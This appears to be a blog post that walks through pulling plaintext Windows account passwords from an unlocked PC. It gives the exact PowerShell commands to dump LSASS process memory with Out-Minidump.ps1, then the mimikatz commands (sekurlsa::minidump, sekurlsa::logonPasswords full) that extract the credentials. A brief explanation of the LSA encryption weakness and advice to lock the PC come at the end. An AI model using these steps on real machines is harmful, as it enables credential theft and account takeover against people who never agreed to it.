Uncover user password from unlocked Windows PC with less than 5 minutes

I found this article mentioning about the existing vulnerability in Windows OS where you can get the plaintext view of your passwords on any unlocked Windows PC. So, I tried it on my Windows 10 PC and found that the vulnerability is still exist. The method used here is not new at all, and anyone can perform this hacking on any unlocked Windows PC providing that they know how to use the following tools.

In summary, here is what you need to do:

Tools you need

Download all the tools above first.

1. Perform memory dump using the PowerShell script

To perform the LSASS dump, I will use the PowerShell script - Out-Minidump.ps1. The flow of cmdlet will look like this:

PowerShell cmdlet
PowerShell cmdlet
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'
# "dot sourcing" method to import function from the script

Get-Process lsass | Out-Minidump
# To perform the LSASS dump

Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'
# Copy the dump file to desired location

2. View the passwords using the mimikatz terminal program

As you can see, lsass_868.dmp is the example of LSASS dump file captured using the PowerShell script. Now, it’s time I need to use the mimikatz terminal to load in the dump file as follows:

sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
mimikatz MINIDUMP
mimikatz MINIDUMP

Switching to MINIDUMP file, so now I can view the passwords. Now, I will run this command to display all the accounts and passwords available:

sekurlsa::logonPasswords full

Voila! There, I can see my actual Microsoft Account username and password in a plaintext view.

mimikatz logonPasswords
mimikatz logonPasswords

Explanation of the vulnerability

The fact is that the password is encrypted but it’s useless as the implementation depends on two basic Win32 functions; LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). So, the Windows stores these encrypted user passwords in memory without using any of one-way hash algorithm which is decryptable using LsaUnprotectMemory function to a plain text.

It is RECOMMENDED to always LOCK your Windows PC when you are away, especially when you are in office or public place. This hacking can simply be done less than five minutes!